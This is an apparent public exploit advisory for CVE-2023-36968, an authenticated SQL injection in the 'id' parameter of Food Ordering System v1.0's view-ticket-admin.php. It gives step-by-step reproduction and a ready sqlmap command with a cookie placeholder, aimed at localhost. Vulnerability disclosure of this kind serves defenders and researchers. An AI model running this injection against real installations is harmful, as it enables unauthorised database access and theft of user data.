#Exploit Title: Food Ordering System v1.0 – Authenticated SQL Injection
#Date: 19 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://github.com/haxxorsid/food-ordering-system
#Version: 1.0
#Tested on: Windows 11
#CVE: 2023-36968
#Affected Parameter: id
#Proof of Concept:
1-) Install Food Ordering System v1.0
2-) Login to the application with the admin user. Click the “All Tickets” menu under “Tickets” from the left menu. Click on any ticket listed.
data:image/s3,"s3://crabby-images/143f2/143f2e01120294ce7aa5d0d38436489d80d2a634" alt=""
3-) The ID parameter in the URL “HTTP://localhost/food/view-ticket-admin.php?id=1” is affected by SQL Injection vulnerability.
data:image/s3,"s3://crabby-images/6e18f/6e18f973d2a2f95d5a83a27003df8e1b6ff5a6ff" alt=""
data:image/s3,"s3://crabby-images/5e266/5e26626c4b65d61195ad9c8527ceb2e2f11416b8" alt=""
#SQLMap Command:
sqlmap -u “http://localhost/food/view-ticket-admin.php?id=1″ –cookie=”cookie_value”
data:image/s3,"s3://crabby-images/0003e/0003e6cbee467fc40299f99b9130bef4444b1777" alt=""
data:image/s3,"s3://crabby-images/d8a5d/d8a5dd5b7b7c3272d939f722038d65c57e223121" alt=""
data:image/s3,"s3://crabby-images/f3517/f3517886d5dc768555fbf5fdd1ef6be7ef1c22db" alt=""